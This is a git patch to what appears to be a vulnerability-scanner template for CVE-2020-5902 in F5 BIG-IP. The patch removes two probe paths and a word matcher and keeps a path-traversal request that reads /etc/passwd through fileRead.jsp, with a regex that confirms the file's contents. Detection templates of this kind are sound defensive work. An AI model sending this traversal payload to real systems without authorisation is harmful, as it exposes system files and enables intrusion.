From 0fe4c5ee3dc857f2a1c8bf49648525fdbea0a912 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Sun, 5 Jul 2020 21:47:48 +0530 Subject: [PATCH] Update CVE-2020-5902.yaml --- cves/CVE-2020-5902.yaml | 9 --------- 1 file changed, 9 deletions(-) diff --git a/cves/CVE-2020-5902.yaml b/cves/CVE-2020-5902.yaml index 25182f29cf..fbf597e26c 100644 --- a/cves/CVE-2020-5902.yaml +++ b/cves/CVE-2020-5902.yaml @@ -8,21 +8,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa" - - "{{BaseURL}}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - - type: word - words: - - "jaffa" - - "Tabset" - - "success" - condition: and - part: body - type: regex regex: - "root:[x*]:0:0:"